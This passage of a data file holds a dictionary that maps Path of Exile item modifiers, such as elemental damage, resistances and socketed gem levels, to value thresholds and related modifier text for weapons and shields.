"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.3% of Mana Regenerated per second')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(100, '(10 - 12) to all Attributes\n(5 - 10)% chance to gain an Endurance Charge on Kill'), (100, '(5 - 10)% chance to gain a Power Charge on Kill')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted\n(40 - 50)% increased Spell Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, 'Adds 1 to (5 - 6) Lightning Damage to Attacks with this Weapon per 10 Intelligence'), (200, '1% increased Spell Damage per 16 Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (1 - 2) to (3 - 4) Fire Damage to Attacks with this Weapon per 10 Strength'), (200, '1% increased Spell Damage per 16 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana'), (500, '(6 - 8)% increased Attack Damage per 500 Maximum Mana\n(6 - 8)% increased Spell Damage per 500 Maximum Mana')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance')],
"+#% to Cold Damage over Time Multiplier": [(45, '(9 - 10) to Cold Damage over Time Multiplier'), (90, '(11 - 12) to Cold Damage over Time Multiplier'), (500, '(13 - 15) to Cold Damage over Time Multiplier')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Always Freezes Enemies on Hit": [(20, 'Always Freezes Enemies on Hit'), (40, 'Always Freezes Enemies on Hit'), (200, 'Always Freezes Enemies on Hit\n(8 - 10)% increased Freeze Duration on Enemies')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"Shield": {
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% Chance to Block Spell Damage": [(28, '(2 - 3)% Chance to Block Spell Damage'), (50, '(4 - 5)% Chance to Block Spell Damage')],
"#% additional Physical Damage Reduction": [(6, '(-15 - -11) Physical Damage taken from Attacks'), (12, '(-20 - -16) Physical Damage taken from Attacks'), (50, '(-25 - -21) Physical Damage taken from Attacks')],
"#% chance to Avoid Cold Damage when Hit": [(14, '(11 - 12) to Cold Resistance'), (27, '(13 - 14) to Cold Resistance'), (50, '(15 - 16) to Cold Resistance\n(3 - 5)% chance to Avoid Cold Damage when Hit')],
"#% chance to Avoid Elemental Ailments": [(30, '(15 - 20)% reduced Elemental Ailment Duration on you'), (60, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you\n(16 - 25)% chance to Avoid Elemental Ailments')],
"#% chance to Avoid Fire Damage when Hit": [(14, '(11 - 12) to Fire Resistance'), (27, '(13 - 14) to Fire Resistance'), (50, '(15 - 16) to Fire Resistance\n(3 - 5)% chance to Avoid Fire Damage when Hit')],
"#% chance to Avoid Lightning Damage when Hit": [(14, '(11 - 12) to Lightning Resistance'), (27, '(13 - 14) to Lightning Resistance'), (50, '(15 - 16) to Lightning Resistance\n(3 - 5)% chance to Avoid Lightning Damage when Hit')],
"#% chance to Avoid being Poisoned": [(55, '(14 - 16)% chance to Avoid being Poisoned'), (110, '(18 - 21)% chance to Avoid being Poisoned'), (200, '(22 - 25)% chance to Avoid being Poisoned')],
"#% chance to Avoid being Stunned": [(20, '(10 - 11)% chance to Avoid being Stunned'), (40, '(12 - 13)% chance to Avoid being Stunned'), (55, '(14 - 15)% chance to Avoid being Stunned'), (150, '(14 - 15)% chance to Avoid being Stunned\n100% chance to avoid Bleeding')],
"#% chance to Dodge Attack Hits": [(10, '2% chance to Dodge Attack Hits'), (20, '(4 - 5)% chance to Dodge Attack Hits')],
"#% chance to Dodge Spell Hits": [(10, '2% chance to Dodge Spell Hits'), (20, '(4 - 5)% chance to Dodge Spell Hits')],
"#% chance to avoid Bleeding": [(55, '(14 - 16)% chance to avoid Bleeding'), (110, '(18 - 21)% chance to avoid Bleeding'), (200, '(22 - 25)% chance to avoid Bleeding')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(20, '(12 - 13)% increased Attack Damage\n(12 - 13)% increased Spell Damage'), (40, '(14 - 16)% increased Attack Damage\n(14 - 16)% increased Spell Damage'), (100, '(17 - 20)% increased Attack Damage\n(17 - 20)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(11, '3% increased Attack and Cast Speed'), (22, '4% increased Attack and Cast Speed'), (50, '5% increased Attack and Cast Speed\n(5 - 8)% chance to gain Onslaught for 4 seconds on Kill')],
"#% chance to gain a Power Charge when you Block": [(25, '(3 - 4)% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% chance to gain an additional Vaal Soul on Kill": [(50, 'Immune to Curses if Corrupted')],
"#% increased Armour": [(100, '(15 - 18)% increased Armour'), (175, '(19 - 22)% increased Armour'), (250, '(23 - 26)% increased Armour'), (325, '(27 - 30)% increased Armour'), (400, '(30 - 35)% increased Armour'), (1000, '(4 - 5) Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage')],
"#% increased Armour and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5) Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\nSocketed Gems have 10% reduced Mana Reservation')],
"#% increased Armour and Evasion": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating'), (1000, '(4 - 5) Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\n(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits')],
"#% increased Armour, Evasion and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5) Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\n(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits\nSocketed Gems have 10% reduced Mana Reservation')],
"#% increased Attack Damage": [(60, '(23 - 26)% increased Attack Damage'), (90, '(27 - 30)% increased Attack Damage'), (500, '(31 - 35)% increased Attack Damage')],
"#% increased Attack Speed": [(20, '3% increased Attack Speed'), (30, '4% increased Attack Speed'), (100, '5% increased Attack Speed')],
"#% increased Attack and Cast Speed": [(15, '4% increased Attack and Cast Speed'), (50, '5% increased Attack and Cast Speed')],
"#% increased Cast Speed": [(20, '3% increased Cast Speed'), (30, '4% increased Cast Speed'), (100, '5% increased Cast Speed')],
"#% increased Cold Damage": [(50, '8% increased Cold Damage'), (100, '(9 - 10)% increased Cold Damage'), (150, '(11 - 12)% increased Cold Damage'), (200, '(13 - 14)% increased Cold Damage'), (500, '(15 - 16)% increased Cold Damage\n(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Effect of your Curses": [(13, 'Curse Skills have (10 - 15)% increased Skill Effect Duration'), (26, 'Curse Skills have (16 - 20)% increased Skill Effect Duration'), (50, '(10 - 15)% increased Flammability Curse Effect\n(10 - 15)% increased Frostbite Curse Effect\n(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Elemental Damage": [(20, '8% increased Elemental Damage'), (40, '(9 - 10)% increased Elemental Damage'), (60, '(11 - 12)% increased Elemental Damage'), (80, '(13 - 14)% increased Elemental Damage'), (500, '(15 - 16)% increased Elemental Damage\n(20 - 30)% increased Elemental Weakness Curse Effect')],
"#% increased Energy Shield": [(100, '(15 - 16)% increased Energy Shield'), (175, '(17 - 18)% increased Energy Shield'), (250, '(19 - 20)% increased Energy Shield'), (325, '(21 - 22)% increased Energy Shield'), (400, '(23 - 25)% increased Energy Shield'), (1000, 'Socketed Gems have 10% reduced Mana Reservation')],
"#% increased Evasion Rating": [(100, '(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Evasion Rating'), (1000, '(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits')],
"#% increased Evasion and Energy Shield": [(100, '(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits\nSocketed Gems have 10% reduced Mana Reservation')],
"#% increased Fire Damage": [(50, '8% increased Fire Damage'), (100, '(9 - 10)% increased Fire Damage'), (150, '(11 - 12)% increased Fire Damage'), (200, '(13 - 14)% increased Fire Damage'), (500, '(15 - 16)% increased Fire Damage\n(20 - 30)% increased Flammability Curse Effect')],
"#% increased Global Physical Damage": [(20, '8% increased Global Physical Damage'), (40, '(9 - 10)% increased Global Physical Damage'), (60, '(11 - 12)% increased Global Physical Damage'), (80, '(13 - 14)% increased Global Physical Damage'), (500, '(15 - 16)% increased Global Physical Damage\n(20 - 30)% increased Vulnerability Curse Effect')],
"#% increased Lightning Damage": [(50, '8% increased Lightning Damage'), (100, '(9 - 10)% increased Lightning Damage'), (150, '(11 - 12)% increased Lightning Damage'), (200, '(13 - 14)% increased Lightning Damage'), (500, '(15 - 16)% increased Lightning Damage\n(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.3% of Mana Regenerated per second')],
"#% increased Spell Damage": [(150, '(23 - 26)% increased Spell Damage'), (200, '(27 - 30)% increased Spell Damage'), (500, '(31 - 35)% increased Spell Damage')],
"#% increased Stun and Block Recovery": [(30, '(10 - 12)% increased Stun and Block Recovery'), (60, '(13 - 15)% increased Stun and Block Recovery'), (90, '(16 - 18)% increased Stun and Block Recovery'), (110, '(19 - 21)% increased Stun and Block Recovery'), (130, '(22 - 25)% increased Stun and Block Recovery'), (160, '(22 - 25)% increased Stun and Block Recovery\nUnwavering Stance')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(1 - 2) to Minimum Endurance Charges\n(1 - 2) to Minimum Frenzy Charges\n(1 - 2) to Minimum Power Charges')],
"#% reduced Damage taken from Damage Over Time": [(6, '(5 - 6) to Chaos Resistance'), (12, '(7 - 8) to Chaos Resistance'), (20, '(9 - 10) to Chaos Resistance')],
